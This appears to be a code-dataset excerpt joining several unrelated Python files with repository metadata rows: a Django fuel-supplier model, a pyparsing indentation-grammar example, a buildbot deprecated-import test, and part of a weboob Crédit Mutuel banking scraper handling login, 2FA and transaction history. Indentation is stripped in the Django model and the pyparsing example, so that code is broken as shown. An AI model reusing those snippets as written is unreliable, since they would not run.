written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
SUCH DAMAGE.
$Id: Core.py 1053 2007-03-23 21:44:14Z pjenvey $
"""
| bsd-3-clause | 6,536,546,247,990,956,000 | 39.432387 | 119 | 0.639044 | false |
jeffmcnd/tfrs | server/models/FuelSupplier.py | 2 | 1714 | """
REST API Documentation for the NRS TFRS Credit Trading Application
The Transportation Fuels Reporting System is being designed to streamline compliance reporting for transportation fuel suppliers in accordance with the Renewable & Low Carbon Fuel Requirements Regulation.
OpenAPI spec version: v1
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import datetime
from django.db import models
from django.utils import timezone
from .FuelSupplierStatus import FuelSupplierStatus
from .FuelSupplierType import FuelSupplierType
from .FuelSupplierActionsType import FuelSupplierActionsType
from auditable.models import Auditable
class FuelSupplier(Auditable):
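    # core fuel supplier record: name, status/type/actions-type foreign keys and creation date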
name = models.CharField(max_length=500)
fuelSupplierStatusFK = models.ForeignKey('FuelSupplierStatus', related_name='FuelSupplierfuelSupplierStatusFK')
fuelSupplierTypeFK = models.ForeignKey('FuelSupplierType', related_name='FuelSupplierfuelSupplierTypeFK')
fuelSupplierActionsTypeFK = models.ForeignKey('FuelSupplierActionsType', related_name='FuelSupplierfuelSupplierActionsTypeFK')
createdDate = models.DateField()
class Meta:
db_table = 'FUEL_SUPPLIER'
| apache-2.0 | -1,584,284,232,255,401,200 | 41.775 | 208 | 0.773046 | false |
FrankBian/kuma | vendor/packages/pyparsing/examples/indentedGrammarExample.py | 16 | 1927 | # indentedGrammarExample.py
#
# Copyright (c) 2006, Paul McGuire
#
# A sample of a pyparsing grammar using indentation for
# grouping (like Python does).
#
from pyparsing import *
data = """\
def A(z):
A1
B = 100
G = A2
A2
A3
B
def BB(a,b,c):
BB1
def BBA():
bba1
bba2
bba3
C
D
def spam(x,y):
def eggs(z):
pass
"""
indentStack = [1]
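# the parse actions below maintain indentStack to track the current indentation levels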
def checkPeerIndent(s,l,t):
curCol = col(l,s)
if curCol != indentStack[-1]:
if (not indentStack) or curCol > indentStack[-1]:
raise ParseFatalException(s,l,"illegal nesting")
raise ParseException(s,l,"not a peer entry")
def checkSubIndent(s,l,t):
curCol = col(l,s)
if curCol > indentStack[-1]:
indentStack.append( curCol )
else:
raise ParseException(s,l,"not a subentry")
def checkUnindent(s,l,t):
if l >= len(s): return
curCol = col(l,s)
if not(curCol < indentStack[-1] and curCol <= indentStack[-2]):
raise ParseException(s,l,"not an unindent")
def doUnindent():
indentStack.pop()
INDENT = lineEnd.suppress() + empty + empty.copy().setParseAction(checkSubIndent)
UNDENT = FollowedBy(empty).setParseAction(checkUnindent)
UNDENT.setParseAction(doUnindent)
stmt = Forward()
suite = Group( OneOrMore( empty + stmt.setParseAction( checkPeerIndent ) ) )
identifier = Word(alphas, alphanums)
funcDecl = ("def" + identifier + Group( "(" + Optional( delimitedList(identifier) ) + ")" ) + ":")
funcDef = Group( funcDecl + INDENT + suite + UNDENT )
rvalue = Forward()
funcCall = Group(identifier + "(" + Optional(delimitedList(rvalue)) + ")")
rvalue << (funcCall | identifier | Word(nums))
assignment = Group(identifier + "=" + rvalue)
stmt << ( funcDef | assignment | identifier )
print data
parseTree = suite.parseString(data)
import pprint
pprint.pprint( parseTree.asList() )
| mpl-2.0 | 6,896,793,203,863,243,000 | 22.705128 | 98 | 0.6274 | false |
pmisik/buildbot | master/buildbot/test/regressions/test_oldpaths.py | 5 | 4230 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import warnings
from twisted.trial import unittest
from buildbot.warnings import DeprecatedApiWarning
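# decorator: run the wrapped test, then assert exactly one DeprecatedApiWarning was flushed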
def deprecatedImport(fn):
def wrapper(self):
fn(self)
warnings = self.flushWarnings()
        # on older Pythons, this warning appears twice, so collapse it
if len(warnings) == 2 and warnings[0] == warnings[1]:
del warnings[1]
self.assertEqual(len(warnings), 1, "got: %r" % (warnings,))
self.assertEqual(warnings[0]['category'], DeprecatedApiWarning)
return wrapper
class OldImportPaths(unittest.TestCase):
"""
Test that old, deprecated import paths still work.
"""
def test_scheduler_Scheduler(self):
from buildbot.scheduler import Scheduler
assert Scheduler
def test_schedulers_basic_Scheduler(self):
# renamed to basic.SingleBranchScheduler
from buildbot.schedulers.basic import Scheduler
assert Scheduler
def test_scheduler_AnyBranchScheduler(self):
from buildbot.scheduler import AnyBranchScheduler
assert AnyBranchScheduler
def test_scheduler_basic_Dependent(self):
from buildbot.schedulers.basic import Dependent
assert Dependent
def test_scheduler_Dependent(self):
from buildbot.scheduler import Dependent
assert Dependent
def test_scheduler_Periodic(self):
from buildbot.scheduler import Periodic
assert Periodic
def test_scheduler_Nightly(self):
from buildbot.scheduler import Nightly
assert Nightly
def test_scheduler_Triggerable(self):
from buildbot.scheduler import Triggerable
assert Triggerable
def test_scheduler_Try_Jobdir(self):
from buildbot.scheduler import Try_Jobdir
assert Try_Jobdir
def test_scheduler_Try_Userpass(self):
from buildbot.scheduler import Try_Userpass
assert Try_Userpass
def test_schedulers_filter_ChangeFilter(self):
# this was the location of ChangeFilter until 0.8.4
from buildbot.schedulers.filter import ChangeFilter
assert ChangeFilter
def test_process_base_Build(self):
from buildbot.process.base import Build
assert Build
def test_buildrequest_BuildRequest(self):
from buildbot.buildrequest import BuildRequest
assert BuildRequest
def test_process_subunitlogobserver_SubunitShellCommand(self):
from buildbot.process.subunitlogobserver import SubunitShellCommand
assert SubunitShellCommand
def test_steps_source_Source(self):
from buildbot.steps.source import Source
assert Source
def test_buildstep_remotecommand(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecatedApiWarning)
warnings.simplefilter("ignore", DeprecationWarning)
from buildbot.process.buildstep import RemoteCommand, \
LoggedRemoteCommand, RemoteShellCommand
assert RemoteCommand
assert LoggedRemoteCommand
assert RemoteShellCommand
def test_buildstep_logobserver(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore", DeprecatedApiWarning)
warnings.simplefilter("ignore", DeprecationWarning)
from buildbot.process.buildstep import LogObserver, \
LogLineObserver, OutputProgressObserver
assert LogObserver
assert LogLineObserver
assert OutputProgressObserver
| gpl-2.0 | 1,922,292,393,852,996,900 | 33.672131 | 79 | 0.706619 | false |
laurentb/weboob | modules/creditmutuel/browser.py | 1 | 43250 | # -*- coding: utf-8 -*-
# Copyright(C) 2010-2011 Julien Veyssier
#
# This file is part of a weboob module.
#
# This weboob module is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This weboob module is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this weboob module. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import re
import time
from datetime import datetime
from itertools import groupby
from operator import attrgetter
from weboob.exceptions import (
ActionNeeded, AppValidation, AppValidationExpired, AppValidationCancelled, AuthMethodNotImplemented,
BrowserIncorrectPassword, BrowserUnavailable, BrowserQuestion, NoAccountsException,
)
from weboob.tools.compat import basestring
from weboob.tools.value import Value
from weboob.tools.capabilities.bank.transactions import FrenchTransaction, sorted_transactions
from weboob.browser.browsers import need_login, TwoFactorBrowser
from weboob.browser.profiles import Wget
from weboob.browser.url import URL
from weboob.browser.pages import FormNotFound
from weboob.browser.exceptions import ClientError, ServerError
from weboob.capabilities.bank import Account, AddRecipientStep, Recipient, AccountOwnership
from weboob.tools.capabilities.bank.investments import create_french_liquidity
from weboob.capabilities import NotAvailable
from weboob.tools.compat import urlparse
from weboob.capabilities.base import find_object, empty
from .pages import (
LoginPage, LoginErrorPage, AccountsPage, UserSpacePage,
OperationsPage, CardPage, ComingPage, RecipientsListPage,
ChangePasswordPage, VerifCodePage, EmptyPage, PorPage,
IbanPage, NewHomePage, AdvisorPage, RedirectPage,
LIAccountsPage, CardsActivityPage, CardsListPage,
CardsOpePage, NewAccountsPage, InternalTransferPage,
ExternalTransferPage, RevolvingLoanDetails, RevolvingLoansList,
ErrorPage, SubscriptionPage, NewCardsListPage, CardPage2, FiscalityConfirmationPage,
ConditionsPage, MobileConfirmationPage, UselessPage, DecoupledStatePage, CancelDecoupled,
OtpValidationPage, OtpBlockedErrorPage, TwoFAUnabledPage,
LoansOperationsPage,
)
__all__ = ['CreditMutuelBrowser']
class CreditMutuelBrowser(TwoFactorBrowser):
PROFILE = Wget()
TIMEOUT = 30
BASEURL = 'https://www.creditmutuel.fr'
HAS_CREDENTIALS_ONLY = True
STATE_DURATION = 5
TWOFA_DURATION = 60 * 24 * 90
    # connection
login = URL(
r'/fr/authentification.html',
r'/(?P<subbank>.*)fr/$',
r'/(?P<subbank>.*)fr/banques/accueil.html',
r'/(?P<subbank>.*)fr/banques/particuliers/index.html',
LoginPage
)
login_error = URL(r'/(?P<subbank>.*)fr/identification/default.cgi', LoginErrorPage)
twofa_unabled_page = URL(r'/(?P<subbank>.*)fr/banque/validation.aspx', TwoFAUnabledPage)
mobile_confirmation = URL(r'/(?P<subbank>.*)fr/banque/validation.aspx', MobileConfirmationPage)
decoupled_state = URL(r'/fr/banque/async/otp/SOSD_OTP_GetTransactionState.htm', DecoupledStatePage)
cancel_decoupled = URL(r'/fr/banque/async/otp/SOSD_OTP_CancelTransaction.htm', CancelDecoupled)
otp_validation_page = URL(r'/(?P<subbank>.*)fr/banque/validation.aspx', OtpValidationPage)
otp_blocked_error_page = URL(r'/(?P<subbank>.*)fr/banque/validation.aspx', OtpBlockedErrorPage)
fiscality = URL(r'/(?P<subbank>.*)fr/banque/residencefiscale.aspx', FiscalityConfirmationPage)
# accounts
accounts = URL(r'/(?P<subbank>.*)fr/banque/situation_financiere.cgi',
r'/(?P<subbank>.*)fr/banque/situation_financiere.html',
AccountsPage)
useless_page = URL(r'/(?P<subbank>.*)fr/banque/paci/defi-solidaire.html', UselessPage)
revolving_loan_list = URL(r'/(?P<subbank>.*)fr/banque/CR/arrivee.asp\?fam=CR.*', RevolvingLoansList)
revolving_loan_details = URL(r'/(?P<subbank>.*)fr/banque/CR/cam9_vis_lstcpt.asp.*', RevolvingLoanDetails)
user_space = URL(r'/(?P<subbank>.*)fr/banque/espace_personnel.aspx',
r'/(?P<subbank>.*)fr/banque/accueil.cgi',
r'/(?P<subbank>.*)fr/banque/DELG_Gestion',
r'/(?P<subbank>.*)fr/banque/paci_engine/engine.aspx',
r'/(?P<subbank>.*)fr/banque/paci_engine/static_content_manager.aspx',
UserSpacePage)
card = URL(r'/(?P<subbank>.*)fr/banque/operations_carte.cgi.*',
r'/(?P<subbank>.*)fr/banque/mouvements.html\?webid=.*cardmonth=\d+$',
r'/(?P<subbank>.*)fr/banque/mouvements.html.*webid=.*cardmonth=\d+.*cardid=',
CardPage)
operations = URL(r'/(?P<subbank>.*)fr/banque/mouvements.cgi.*',
r'/(?P<subbank>.*)fr/banque/mouvements.html.*',
r'/(?P<subbank>.*)fr/banque/nr/nr_devbooster.aspx.*',
r'(?P<subbank>.*)fr/banque/CRP8_GESTPMONT.aspx\?webid=.*&trnref=.*&contract=\d+&cardid=.*&cardmonth=\d+',
OperationsPage)
# This loans_operations contains operation for some loans, but not all of them.
loans_operations = URL(r'/(?P<subbank>.*)fr/banque/gec9.aspx.*', LoansOperationsPage)
coming = URL(r'/(?P<subbank>.*)fr/banque/mvts_instance.cgi.*', ComingPage)
info = URL(r'/(?P<subbank>.*)fr/banque/BAD.*', EmptyPage)
change_pass = URL(r'/(?P<subbank>.*)fr/validation/change_password.cgi',
'/fr/services/change_password.html', ChangePasswordPage)
verify_pass = URL(r'/(?P<subbank>.*)fr/validation/verif_code.cgi.*',
r'/(?P<subbank>.*)fr/validation/lst_codes.cgi.*', VerifCodePage)
new_home = URL(r'/(?P<subbank>.*)fr/banque/pageaccueil.html',
r'/(?P<subbank>.*)banque/welcome_pack.html', NewHomePage)
empty = URL(r'/(?P<subbank>.*)fr/banques/index.html',
r'/(?P<subbank>.*)fr/banque/paci_beware_of_phishing.*',
r'/(?P<subbank>.*)fr/validation/(?!change_password|verif_code|image_case|infos).*',
EmptyPage)
por = URL(r'/(?P<subbank>.*)fr/banque/POR_ValoToute.aspx',
r'/(?P<subbank>.*)fr/banque/POR_SyntheseLst.aspx',
PorPage)
por_action_needed = URL(r'/(?P<subbank>.*)fr/banque/ORDR_InfosGenerales.aspx', EmptyPage)
li = URL(r'/(?P<subbank>.*)fr/assurances/profilass.aspx\?domaine=epargne',
r'/(?P<subbank>.*)fr/assurances/(consultations?/)?WI_ASS.*',
r'/(?P<subbank>.*)fr/assurances/WI_ASS',
r'/(?P<subbank>.*)fr/assurances/SYNASSINT.aspx.*',
'/fr/assurances/', LIAccountsPage)
iban = URL(r'/(?P<subbank>.*)fr/banque/rib.cgi', IbanPage)
new_accounts = URL(r'/(?P<subbank>.*)fr/banque/comptes-et-contrats.html', NewAccountsPage)
new_operations = URL(r'/(?P<subbank>.*)fr/banque/mouvements.cgi',
r'/fr/banque/nr/nr_devbooster.aspx.*',
r'/(?P<subbank>.*)fr/banque/RE/aiguille(liste)?.asp',
'/fr/banque/mouvements.html',
r'/(?P<subbank>.*)fr/banque/consultation/operations', OperationsPage)
advisor = URL(r'/(?P<subbank>.*)fr/banques/contact/trouver-une-agence/(?P<page>.*)',
r'/(?P<subbank>.*)fr/infoclient/',
r'/(?P<subbank>.*)fr/banques/accueil/menu-droite/Details.aspx\?banque=.*',
AdvisorPage)
redirect = URL(r'/(?P<subbank>.*)fr/banque/paci_engine/static_content_manager.aspx', RedirectPage)
cards_activity = URL(r'/(?P<subbank>.*)fr/banque/pro/ENC_liste_tiers.aspx', CardsActivityPage)
cards_list = URL(r'/(?P<subbank>.*)fr/banque/pro/ENC_liste_ctr.*',
r'/(?P<subbank>.*)fr/banque/pro/ENC_detail_ctr', CardsListPage)
cards_ope = URL(r'/(?P<subbank>.*)fr/banque/pro/ENC_liste_oper', CardsOpePage)
cards_ope2 = URL('/(?P<subbank>.*)fr/banque/CRP8_SCIM_DEPCAR.aspx', CardPage2)
cards_hist_available = URL('/(?P<subbank>.*)fr/banque/SCIM_default.aspx\?_tabi=C&_stack=SCIM_ListeActivityStep%3a%3a&_pid=ListeCartes&_fid=ChangeList&Data_ServiceListDatas_CurrentType=MyCards',
'/(?P<subbank>.*)fr/banque/PCS1_CARDFUNCTIONS.aspx', NewCardsListPage)
cards_hist_available2 = URL('/(?P<subbank>.*)fr/banque/SCIM_default.aspx', NewCardsListPage)
internal_transfer = URL(r'/(?P<subbank>.*)fr/banque/virements/vplw_vi.html', InternalTransferPage)
external_transfer = URL(r'/(?P<subbank>.*)fr/banque/virements/vplw_vee.html', ExternalTransferPage)
recipients_list = URL(r'/(?P<subbank>.*)fr/banque/virements/vplw_bl.html', RecipientsListPage)
error = URL(r'/(?P<subbank>.*)validation/infos.cgi', ErrorPage)
subscription = URL(r'/(?P<subbank>.*)fr/banque/MMU2_LstDoc.aspx', SubscriptionPage)
terms_and_conditions = URL(r'/(?P<subbank>.*)fr/banque/conditions-generales.html',
r'/(?P<subbank>.*)fr/banque/coordonnees_personnelles.aspx',
r'/(?P<subbank>.*)fr/banque/paci_engine/paci_wsd_pdta.aspx',
r'/(?P<subbank>.*)fr/banque/reglementation-dsp2.html', ConditionsPage)
currentSubBank = None
is_new_website = None
form = None
logged = None
need_clear_storage = None
accounts_list = None
def __init__(self, config, *args, **kwargs):
self.config = config
self.weboob = kwargs['weboob']
kwargs['username'] = self.config['login'].get()
kwargs['password'] = self.config['password'].get()
super(CreditMutuelBrowser, self).__init__(config, *args, **kwargs)
self.__states__ += (
'currentSubBank', 'form', 'logged', 'is_new_website',
'need_clear_storage', 'recipient_form',
'twofa_auth_state', 'polling_data', 'otp_data',
)
self.twofa_auth_state = {}
self.polling_data = {}
self.otp_data = {}
self.keep_session = None
self.recipient_form = None
self.AUTHENTICATION_METHODS = {
'resume': self.handle_polling,
'code': self.handle_sms,
}
def get_expire(self):
if self.twofa_auth_state:
expires = datetime.fromtimestamp(self.twofa_auth_state['expires']).isoformat()
return expires
return
def load_state(self, state):
        # when adding a recipient fails, state can't be reloaded.
# If state is reloaded, there is this error message:
# "Navigation interdite - Merci de bien vouloir recommencer votre action."
if state.get('need_clear_storage'):
# only keep 'twofa_auth_state' state to avoid new 2FA
state = {'twofa_auth_state': state.get('twofa_auth_state')}
if state.get('polling_data') or state.get('recipient_form') or state.get('otp_data'):
# can't start on an url in the middle of a validation process
# or server will cancel it and launch another one
if 'url' in state:
state.pop('url')
# if state is empty (first login), it does nothing
super(CreditMutuelBrowser, self).load_state(state)
def finalize_twofa(self, twofa_data):
"""
Go to validated 2FA url. Before following redirection,
store 'auth_client_state' cookie to prove to server,
for a TWOFA_DURATION, that 2FA is already done.
"""
self.location(
twofa_data['final_url'],
data=twofa_data['final_url_params'],
allow_redirects=False
)
for cookie in self.session.cookies:
if cookie.name == 'auth_client_state':
# only present if 2FA is valid
self.twofa_auth_state['value'] = cookie.value # this is a token
self.twofa_auth_state['expires'] = cookie.expires # this is a timestamp
self.location(self.response.headers['Location'])
def handle_polling(self):
        # the website allows 15'; we don't wait that long, but leave sufficient time for the user
        timeout = time.time() + 600.00
while time.time() < timeout:
data = {'transactionId': self.polling_data['polling_id']}
self.decoupled_state.go(data=data)
decoupled_state = self.page.get_decoupled_state()
if decoupled_state == 'VALIDATED':
self.logger.info('AppValidation done, going to final_url')
self.finalize_twofa(self.polling_data)
self.polling_data = {}
return
elif decoupled_state in ('CANCELLED', 'NONE'):
self.polling_data = {}
raise AppValidationCancelled()
assert decoupled_state == 'PENDING', 'Unhandled polling state: "%s"' % decoupled_state
            time.sleep(5)  # the website polls every second; no need to poll that fast
# manually cancel polling before website max duration for it
self.cancel_decoupled.go(data=data)
self.polling_data = {}
raise AppValidationExpired()
def check_otp_blocked(self):
# Too much wrong OTPs, locked down after total 3 wrong inputs
if self.otp_blocked_error_page.is_here():
error_msg = self.page.get_error_message()
raise BrowserUnavailable(error_msg)
def handle_sms(self):
self.otp_data['final_url_params']['otp_password'] = self.code
self.finalize_twofa(self.otp_data)
## cases where 2FA is not finalized
# Too much wrong OTPs, locked down after total 3 wrong inputs
self.check_otp_blocked()
# OTP is expired after 15', we end up on login page
if self.login.is_here():
raise BrowserIncorrectPassword("Le code de confirmation envoyé par SMS n'est plus utilisable")
# Wrong OTP leads to same form with error message, re-raise BrowserQuestion
elif self.otp_validation_page.is_here():
error_msg = self.page.get_error_message()
if 'erroné' not in error_msg:
raise BrowserUnavailable(error_msg)
else:
label = '%s %s' % (error_msg, self.page.get_message())
raise BrowserQuestion(Value('code', label=label))
self.otp_data = {}
def check_redirections(self):
self.logger.info('Checking redirections')
# MobileConfirmationPage or OtpValidationPage is coming but there is no request_information
location = self.response.headers.get('Location', '')
if 'validation.aspx' in location and not self.is_interactive:
self.check_interactive()
elif location:
self.location(location, allow_redirects=False)
def check_auth_methods(self):
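        # dispatch on the 2FA method chosen by the server: mobile app validation (polling) or SMS OTP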
if self.mobile_confirmation.is_here():
self.page.check_bypass()
if self.mobile_confirmation.is_here():
self.polling_data = self.page.get_polling_data()
assert self.polling_data, "Can't proceed to polling if no polling_data"
raise AppValidation(self.page.get_validation_msg())
if self.otp_validation_page.is_here():
self.otp_data = self.page.get_otp_data()
assert self.otp_data, "Can't proceed to SMS handling if no otp_data"
raise BrowserQuestion(Value('code', label=self.page.get_message()))
self.check_otp_blocked()
def init_login(self):
self.login.go()
# 2FA already done, if valid, login() redirects to home page
if self.twofa_auth_state:
self.session.cookies.set('auth_client_state', self.twofa_auth_state['value'])
self.page.login(self.username, self.password, redirect=True)
if not self.page.logged:
# 302 redirect to catch to know if polling
self.page.login(self.username, self.password)
self.check_redirections()
# for cic, there is two redirections
self.check_redirections()
if self.twofa_unabled_page.is_here():
raise ActionNeeded(self.page.get_error_msg())
        # when people try to log in but they are on a sub site of creditmutuel
if not self.page and not self.url.startswith(self.BASEURL):
raise BrowserIncorrectPassword()
if self.login_error.is_here():
raise BrowserIncorrectPassword()
if self.verify_pass.is_here():
raise AuthMethodNotImplemented("L'identification renforcée avec la carte n'est pas supportée.")
self.check_auth_methods()
self.getCurrentSubBank()
def ownership_guesser(self):
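        # guess each account's ownership (owner / co-owner) by matching the connected user's name against account labels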
profile = self.get_profile()
psu_names = profile.name.lower().split()
for account in self.accounts_list:
label = account.label.lower()
            # We try to find "M ou Mme" or "Mlle XXX ou M XXXX" for example (non-exhaustive list)
if re.search(r'.* ((m) ([\w].*|ou )?(m[ml]e)|(m[ml]e) ([\w].*|ou )(m) ).*', label):
account.ownership = AccountOwnership.CO_OWNER
            # We check if the PSU firstname and lastname are in the account label
elif all(name in label.split() for name in psu_names):
account.ownership = AccountOwnership.OWNER
        # Card accounts should be set with the same ownership as their parents
for account in self.accounts_list:
if account.type == Account.TYPE_CARD and not empty(account.parent):
account.ownership = account.parent.ownership
@need_login
def get_accounts_list(self):
if not self.accounts_list:
if self.currentSubBank is None:
self.getCurrentSubBank()
self.two_cards_page = None
self.accounts_list = []
self.revolving_accounts = []
self.unavailablecards = []
self.cards_histo_available = []
self.cards_list =[]
self.cards_list2 =[]
            # For some cards the validity information is only available on these 2 links
self.cards_hist_available.go(subbank=self.currentSubBank)
if self.cards_hist_available.is_here():
self.unavailablecards.extend(self.page.get_unavailable_cards())
for acc in self.page.iter_accounts():
acc._referer = self.cards_hist_available
self.accounts_list.append(acc)
self.cards_list.append(acc)
self.cards_histo_available.append(acc.id)
if not self.cards_list:
self.cards_hist_available2.go(subbank=self.currentSubBank)
if self.cards_hist_available2.is_here():
self.unavailablecards.extend(self.page.get_unavailable_cards())
for acc in self.page.iter_accounts():
acc._referer = self.cards_hist_available2
self.accounts_list.append(acc)
self.cards_list.append(acc)
self.cards_histo_available.append(acc.id)
for acc in self.revolving_loan_list.stay_or_go(subbank=self.currentSubBank).iter_accounts():
self.accounts_list.append(acc)
self.revolving_accounts.append(acc.label.lower())
# Handle cards on tiers page
self.cards_activity.go(subbank=self.currentSubBank)
companies = self.page.companies_link() if self.cards_activity.is_here() else \
[self.page] if self.is_new_website else []
for company in companies:
# We need to return to the main page to avoid navigation error
self.cards_activity.go(subbank=self.currentSubBank)
page = self.open(company).page if isinstance(company, basestring) else company
for card in page.iter_cards():
card2 = find_object(self.cards_list, id=card.id[:16])
if card2:
# In order to keep the id of the card from the old space, we exchange the following values
card._link_id = card2._link_id
card._parent_id = card2._parent_id
card.coming = card2.coming
card._referer = card2._referer
card._secondpage = card2._secondpage
self.accounts_list.remove(card2)
self.accounts_list.append(card)
self.cards_list2.append(card)
self.cards_list.extend(self.cards_list2)
# Populate accounts from old website
if not self.is_new_website:
self.logger.info('On old creditmutuel website')
self.accounts.stay_or_go(subbank=self.currentSubBank)
has_no_account = self.page.has_no_account()
self.accounts_list.extend(self.page.iter_accounts())
self.iban.go(subbank=self.currentSubBank).fill_iban(self.accounts_list)
self.por.go(subbank=self.currentSubBank)
self.page.add_por_accounts(self.accounts_list)
# Populate accounts from new website
else:
self.new_accounts.stay_or_go(subbank=self.currentSubBank)
has_no_account = self.page.has_no_account()
self.accounts_list.extend(self.page.iter_accounts())
self.iban.go(subbank=self.currentSubBank).fill_iban(self.accounts_list)
self.por.go(subbank=self.currentSubBank)
self.page.add_por_accounts(self.accounts_list)
self.li.go(subbank=self.currentSubBank)
self.accounts_list.extend(self.page.iter_li_accounts())
# This type of account is like a loan, for splitting payments in smaller amounts.
# Its history is irrelevant because money is debited from a checking account and
# the balance is not even correct, so ignore it.
excluded_label = ['etalis', 'valorisation totale']
accounts_by_id = {}
for acc in self.accounts_list:
if acc.label.lower() not in excluded_label:
accounts_by_id[acc.id] = acc
# Set the parent to loans and cards accounts
for acc in self.accounts_list:
if acc.type == Account.TYPE_CARD and not empty(getattr(acc, '_parent_id', None)):
acc.parent = accounts_by_id.get(acc._parent_id, NotAvailable)
elif acc.type in (Account.TYPE_MORTGAGE, Account.TYPE_LOAN) and acc._parent_id:
acc.parent = accounts_by_id.get(acc._parent_id, NotAvailable)
self.accounts_list = list(accounts_by_id.values())
if has_no_account and not self.accounts_list:
raise NoAccountsException(has_no_account)
self.ownership_guesser()
return self.accounts_list
def get_account(self, _id):
assert isinstance(_id, basestring)
for a in self.get_accounts_list():
if a.id == _id:
return a
def getCurrentSubBank(self):
# the account list and history urls depend on the sub bank of the user
paths = urlparse(self.url).path.lstrip('/').split('/')
self.currentSubBank = paths[0] + "/" if paths[0] != "fr" else ""
if self.currentSubBank and paths[0] == 'banqueprivee' and paths[1] == 'mabanque':
self.currentSubBank = 'banqueprivee/mabanque/'
if self.currentSubBank and paths[1] == "decouverte":
self.currentSubBank += paths[1] + "/"
if paths[0] in ["cmmabn", "fr", "mabanque", "banqueprivee"]:
self.is_new_website = True
def list_operations(self, page, account):
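        # open the operations page (given as an url or as a page object) and iterate its transactions, submitting the "load more" form when needed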
if isinstance(page, basestring):
if page.startswith('/') or page.startswith('https') or page.startswith('?'):
self.location(page)
else:
try:
self.location('%s/%sfr/banque/%s' % (self.BASEURL, self.currentSubBank, page))
except ServerError as e:
self.logger.warning('Page cannot be visited: %s/%sfr/banque/%s: %s', self.BASEURL, self.currentSubBank, page, e)
raise BrowserUnavailable()
else:
self.page = page
# On some savings accounts, the page lands on the contract tab, and we want the situation
if account.type == Account.TYPE_SAVINGS and "Capital Expansion" in account.label:
self.page.go_on_history_tab()
if self.li.is_here():
return self.page.iter_history()
if self.is_new_website and self.page:
try:
for page in range(1, 50):
# Need to reach the page with all transactions
if not self.page.has_more_operations():
break
form = self.page.get_form(id="I1:P:F")
form['_FID_DoLoadMoreTransactions'] = ''
form['_wxf2_pseq'] = page
form.submit()
# IndexError when form xpath returns [], StopIteration if next called on empty iterable
except (StopIteration, FormNotFound):
self.logger.warning('Could not get history on new website')
except IndexError:
# 6 months history is not available
pass
while self.page:
try:
                    # Submit form if there are more transactions to fetch
form = self.page.get_form(id="I1:fm")
if self.page.doc.xpath('boolean(//a[@class="ei_loadmorebtn"])'):
form['_FID_DoLoadMoreTransactions'] = ""
form.submit()
else:
break
except (IndexError, FormNotFound):
break
# Sometimes the browser can't go further
except ClientError as exc:
if exc.response.status_code == 413:
break
raise
if not self.operations.is_here():
return iter([])
return self.pagination(lambda: self.page.get_history())
def get_monthly_transactions(self, trs):
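        # aggregate card transactions into one synthetic "RELEVE CARTE" summary transaction per month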
date_getter = attrgetter('date')
groups = [list(g) for k, g in groupby(sorted(trs, key=date_getter), date_getter)]
trs = []
for group in groups:
if group[0].date > datetime.today().date():
continue
tr = FrenchTransaction()
tr.raw = tr.label = "RELEVE CARTE %s" % group[0].date
tr.amount = -sum(t.amount for t in group)
tr.date = tr.rdate = tr.vdate = group[0].date
tr.type = FrenchTransaction.TYPE_CARD_SUMMARY
tr._is_coming = False
tr._is_manualsum = True
trs.append(tr)
return trs
@need_login
def get_history(self, account):
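        # card accounts with available history are fetched month by month; other accounts go through list_operations()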
transactions = []
if not account._link_id:
raise NotImplementedError()
if len(account.id) >= 16 and account.id[:16] in self.cards_histo_available:
if self.two_cards_page:
                # In this case, we need to return to the page where iter_accounts got the cards information.
                # Indeed, for the same card position, the two pages use exactly the same url, headers and parameters
account._referer.go(subbank=self.currentSubBank)
if account._secondpage:
self.location(self.page.get_second_page_link())
            # Check if the '000000xxxxxx0000' card has an annual history
self.location(account._link_id)
# The history of the card is available for 1 year with 1 month per page
            # Here we collect all the urls needed, to better handle merged subtransactions
urlstogo = self.page.get_links()
self.location(account._link_id)
half_history = 'firstHalf'
for url in urlstogo:
transactions = []
self.location(url)
if 'GoMonthPrecedent' in url:
                    # To reach the last 6 months of history you need to change this url parameter
                    # Moreover we are on a transition page where we see the next 6 months (no scraping here)
half_history = 'secondHalf'
else:
history = self.page.get_history()
self.tr_date = self.page.get_date()
amount_summary = self.page.get_amount_summary()
if self.page.has_more_operations():
